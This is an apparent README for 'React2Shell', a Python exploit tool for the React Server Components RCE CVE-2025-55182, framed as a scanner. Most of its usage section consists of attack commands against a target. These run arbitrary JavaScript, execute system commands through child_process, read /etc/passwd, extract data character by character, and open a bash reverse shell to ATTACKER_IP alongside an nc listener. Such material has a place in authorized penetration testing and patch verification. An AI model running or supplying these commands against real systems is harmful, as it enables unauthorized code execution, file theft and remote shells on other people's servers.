Share
## https://sploitus.com/exploit?id=F1F9E5F4-2C2F-5056-BEDC-5E54D8E71135
# CVE-2025-55182 - React2Shell
```
โโโโโโโ โโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโ โโโโโโโโโโโโโโ โโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโ โโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ
โโโโโโโโโโโโโโ โโโโโโโโโโโ โโโ โโโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ
โโโ โโโโโโโโโโโโโโ โโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโโโโโโโโ โโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
**Remote Code Execution Scanner for React Server Components (RSC)**
[](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
[](https://www.python.org/)
---
## Credits
| Role | Name | Link |
|------|------|------|
| **Original Research** | Lachlan Davidson | [github.com/lachlan2k](https://github.com/lachlan2k) |
Based on the original PoC: [React2Shell-CVE-2025-55182-original-poc](https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc)
---
## Overview
**React2Shell** is a comprehensive security scanner for CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability affecting React Server Components (RSC) implementations. This vulnerability allows unauthenticated attackers to execute arbitrary JavaScript code on the server through unsafe deserialization in the React Flight protocol.
### Key Features
- **Multi-Variant Testing**: Tests 4 different payload structures from original research
- **Version Detection**: Identify vulnerable React and framework versions
- **RCE Verification**: Confirm code execution via digest variation, timing, and OOB callbacks
- **OOB Testing**: Support for Burp Collaborator and Interactsh
- **Custom Payloads**: Execute arbitrary JavaScript on vulnerable servers
- **Data Extraction**: Character-by-character data exfiltration
- **Professional Output**: Clean, colored terminal output with evidence collection
---
## Installation
```bash
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182
# Install dependencies
pip install requests
# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h
```
---
## Usage
```
usage: exploit_cve_2025_55182_v2.py [-h] -t TARGET -m {version,verify,custom}
[--js JS] [--extract] [--sleep SECONDS]
[--callback URL] [--dns DOMAIN] [-v]
[--no-color] [--timeout TIMEOUT]
```
### Required Arguments
| Argument | Description |
|----------|-------------|
| `-t, --target` | Target URL (e.g., https://example.com) |
| `-m, --mode` | Scan mode: `version`, `verify`, or `custom` |
### Optional Arguments
| Argument | Description |
|----------|-------------|
| `--js` | JavaScript code for custom mode |
| `--extract` | Extract string result character by character |
| `--sleep SECONDS` | Time-based RCE verification (verify mode) |
| `--callback URL` | HTTP callback URL for OOB testing (verify mode) |
| `--dns DOMAIN` | DNS callback domain for OOB testing (verify mode) |
| `-v, --verbose` | Verbose output with payload details |
| `--no-color` | Disable colored output |
| `--timeout SECONDS` | HTTP request timeout (default: 30) |
---
## Scan Modes
### 1. Version Mode (`-m version`)
Passively detects vulnerable React and framework versions:
```bash
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m version
```
### 2. Verify Mode (`-m verify`)
Actively confirms RCE using multiple techniques and all 4 payload variants:
```bash
# Basic verification (digest variation)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify
# With time-based verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5
# With OOB callback (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com
# Full verification with verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
--sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v
```
### 3. Custom Mode (`-m custom`)
Execute arbitrary JavaScript payloads:
```bash
# Get Node.js version
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.version" --extract
# Execute system command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('child_process').execSync('id').toString()" --extract
# Read file
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('fs').readFileSync('/etc/passwd','utf8')" --extract
```
---
## Examples
### Basic Scans
```bash
# Version detection
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m version
# RCE verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify
# Verbose output
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v
```
### Advanced Usage
```bash
# Time-based + OOB verification
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
--sleep 5 --callback your-id.oastify.com
# Extract server info
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.version" --extract
# Execute command
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "require('child_process').execSync('whoami').toString()" --extract
```
### Reverse Shell
```bash
# Start listener
nc -lvnp 443
# Execute reverse shell
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
--js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"
```
---
## Disclaimer
**This tool is provided for authorized security testing and educational purposes only.**
- Only use against systems you own or have explicit permission to test
- Unauthorized access to computer systems is illegal
- The authors are not responsible for misuse of this tool
- Always follow responsible disclosure practices
---
## References
- [CVE-2025-55182 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Original PoC by Lachlan Davidson](https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc)
- [React Security Advisory](https://github.com/facebook/react/security/advisories)
- [Next.js Security Advisory](https://github.com/vercel/next.js/security/advisories)
- [React Server Components Documentation](https://react.dev/reference/rsc/server-components)